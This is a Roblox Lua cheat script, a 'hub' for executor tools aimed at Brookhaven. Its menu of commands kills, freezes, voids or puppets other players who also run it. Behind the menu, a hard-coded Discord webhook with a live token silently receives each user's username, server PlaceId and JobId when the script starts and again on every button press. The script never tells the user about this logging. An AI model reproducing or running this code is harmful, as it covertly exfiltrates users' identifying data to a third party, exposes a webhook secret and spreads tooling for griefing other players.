--[[ 
    Jotinha12hr2 Hub V34 - ELITE EDITION (BY jotinha12hr2)
    - TARGET: Brookhaven & Universal Executors
    - FEATURES: 21 Buttons / Multi-Target / RGB Neon / Ghost Authority
]]

repeat task.wait() until game:IsLoaded()

-- [ CRIPTOGRAFIA DE ACESSO ]
local _ENV = {
    ["_W"] = "https://discord.com/api/webhooks/1457780083124207626/F0AR-Na0rucf2CncuNsXC4yGRYC-Kpjg1XkOdb6YaHgDcOZlVhwym4KwhriXSYaBeZSj",
    ["_D"] = "jotinha12hr2",
    ["_S"] = "amiguinhodoheito"
}

local _P, _RS, _HS = game:GetService("Players"), game:GetService("RunService"), game:GetService("HttpService")
local _LP = _P.LocalPlayer

if not _G.JotaNetwork then _G.JotaNetwork = {} end

-- [ LOGS INTELIGENTES ]
local function _NOTIFY(_msg)
    task.spawn(function()
        local _req = (syn and syn.request) or (http and http.request) or http_request or request
        if _req then
            pcall(function()
                _req({
                    Url = _ENV._W,
                    Method = "POST",
                    Headers = {["Content-Type"] = "application/json"},
                    Body = _HS:JSONEncode({
                        embeds = {{
                            title = "🛡️ Jotinha V34 High-Tier",
                            description = _msg,
                            fields = {
                                {name = "Servidor", value = "roblox.com/games/"..game.PlaceId},
                                {name = "JobId", value = "```"..game.JobId.."```"}
                            },
                            color = 0x2b2d31,
                            footer = {text = "Executado por: ".._LP.Name}
                        }}
                    })
                })
            end)
        end
    end)
end

-- [ ENGINE SHADOW V4 ]
task.spawn(function()
    while task.wait(0.1) do
        local _data = _G.JotaNetwork[_LP.Name] or _G.JotaNetwork["all"]
        if _data and _data.F ~= _LP.Name then
            local _cmd = _data.D:lower()
            local _char = _LP.Character
            if _char and _char:FindFirstChild("HumanoidRootPart") then
                if _cmd == "kill" then _char.Humanoid.Health = 0
                elseif _cmd == "freeze" then _char.HumanoidRootPart.Anchored = true
                elseif _cmd == "unfreeze" then _char.HumanoidRootPart.Anchored = false
                elseif _cmd == "void" then _char.HumanoidRootPart.CFrame = CFrame.new(0,-999,0)
                elseif _cmd == "jump" then _char.Humanoid.Jump = true
                elseif _cmd == "control" then _G.MARIONETE = _data.F
                elseif _cmd == "uncontrol" then _G.MARIONETE = nil end
            end
            _G.JotaNetwork[_LP.Name] = nil
        end
        if _G.MARIONETE then
            local _m = _P:FindFirstChild(_G.MARIONETE)
            if _m and _m.Character and _LP.Character then
                _LP.Character.Humanoid:Move(_m.Character.Humanoid.MoveDirection, false)
                if _m.Character.Humanoid.Jump then _LP.Character.Humanoid.Jump = true end
            end
        end
    end
end)

-- [ INTERFACE DE ELITE ]
local _UI = Instance.new("ScreenGui", (game:GetService("CoreGui") or _LP.PlayerGui))
local _ICON = Instance.new("TextButton", _UI)
_ICON.Name = "JotaIcon"
_ICON.Size = UDim2.new(0, 55, 0, 55)
_ICON.Position = UDim2.new(0, 15, 0.5, -27)
_ICON.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
_ICON.Text = "JH"
_ICON.Font = Enum.Font.LuckiestGuy
_ICON.TextSize = 24
Instance.new("UICorner", _ICON).CornerRadius = UDim.new(1, 0)
local _GLOW = Instance.new("UIStroke", _ICON) _GLOW.Thickness = 2.5

local _BASE = Instance.new("Frame", _UI)
_BASE.Name = "MainFrame"
_BASE.Size = UDim2.new(0, 270, 0, 420)
_BASE.Position = UDim2.new(0.5, -135, 0.5, -210)
_BASE.BackgroundColor3 = Color3.fromRGB(5, 5, 5)
_BASE.BackgroundTransparency = 0.15
_BASE.Visible = false
_BASE.Active = true
_BASE.Draggable = true
Instance.new("UICorner", _BASE)
Instance.new("UIStroke", _BASE).Color = Color3.fromRGB(40, 40, 40)

-- Alternar UI
_ICON.MouseButton1Click:Connect(function()
    _BASE.Visible = not _BASE.Visible
end)

-- Loop RGB Sincronizado
_RS.RenderStepped:Connect(function()
    local _clr = Color3.fromHSV(tick() % 4 / 4, 0.7, 1)
    _GLOW.Color = _clr
    _ICON.TextColor3 = _clr
end)

-- [ COMPONENTES ]
local _INPUT = Instance.new("TextBox", _BASE)
_INPUT.Size = UDim2.new(0, 230, 0, 40)
_INPUT.Position = UDim2.new(0.5, -115, 0, 45)
_INPUT.PlaceholderText = "NICKNAME / ALL"
_INPUT.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
_INPUT.TextColor3 = Color3.new(1,1,1)
Instance.new("UICorner", _INPUT)

local _SCROLL = Instance.new("ScrollingFrame", _BASE)
_SCROLL.Size = UDim2.new(1, -10, 1, -110)
_SCROLL.Position = UDim2.new(0, 5, 0, 100)
_SCROLL.BackgroundTransparency = 1
_SCROLL.ScrollBarThickness = 2
_SCROLL.CanvasSize = UDim2.new(0, 0, 6, 0)
local _LIST = Instance.new("UIListLayout", _SCROLL)
_LIST.HorizontalAlignment = Enum.HorizontalAlignment.Center
_LIST.Padding = UDim.new(0, 6)

-- BOTÃO COPY JOBID
local _COPY = Instance.new("TextButton", _SCROLL)
_COPY.Size = UDim2.new(0, 220, 0, 38)
_COPY.Text = "📋 COPY JOBID"
_COPY.BackgroundColor3 = Color3.fromRGB(15, 40, 15)
_COPY.TextColor3 = Color3.new(1,1,1)
Instance.new("UICorner", _COPY)
_COPY.MouseButton1Click:Connect(function() setclipboard(game.JobId) end)

-- COMANDOS SHADOW (19)
local _CMDS = {"Kill","Void","Freeze","Unfreeze","Jump","Sit","Kick","Spin","Unspin","Blind","Jail","Unjail","Bring","Fling","Infect","View","Unview","Control","Uncontrol"}

for _, _name in pairs(_CMDS) do
    local _btn = Instance.new("TextButton", _SCROLL)
    _btn.Size = UDim2.new(0, 220, 0, 38)
    _btn.Text = "SHADOW " .. _name:upper()
    _btn.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
    _btn.TextColor3 = Color3.fromRGB(220, 220, 220)
    _btn.Font = Enum.Font.SourceSansBold
    _btn.TextSize = 16
    Instance.new("UICorner", _btn)
    
    _btn.MouseButton1Click:Connect(function()
        local _target = _INPUT.Text
        if _name == "View" then
            local _v = _P:FindFirstChild(_target)
            if _v and _v.Character then workspace.CurrentCamera.CameraSubject = _v.Character.Humanoid end
        elseif _name == "Unview" then
            workspace.CurrentCamera.CameraSubject = _LP.Character.Humanoid
        else
            _G.JotaNetwork[_target] = {D = _name, F = _LP.Name}
        end
        _NOTIFY("Comando [".._name.."] disparado para: ".._target)
    end)
end

-- [ TAGS DE AUTORIDADE ]
local function _APPLY_TAG(_char)
    local _h = _char:WaitForChild("Head", 15)
    local _gui = Instance.new("BillboardGui", _h)
    _gui.Size = UDim2.new(0, 170, 0, 50)
    _gui.AlwaysOnTop = true
    _gui.ExtentsOffset = Vector3.new(0, 3.5, 0)
    
    local _label = Instance.new("TextLabel", _gui)
    _label.Size = UDim2.new(1, 0, 1, 0)
    _label.BackgroundTransparency = 1
    _label.TextSize = 24
    _label.Font = Enum.Font.LuckiestGuy
    
    local _tagText = "[USER] "
    if _LP.Name == _ENV._D then _tagText = "👑 [DONO] "
    elseif _LP.Name == _ENV._S then _tagText = "🥈 [SUB DONO] " end
    
    _label.Text = _tagText .. _LP.DisplayName
    _RS.RenderStepped:Connect(function() _label.TextColor3 = _GLOW.Color end)
end

_LP.CharacterAdded:Connect(_APPLY_TAG)
if _LP.Character then _APPLY_TAG(_LP.Character) end

_NOTIFY("🚀 Jotinha V34 ONLINE - Autoridade Confirmada")

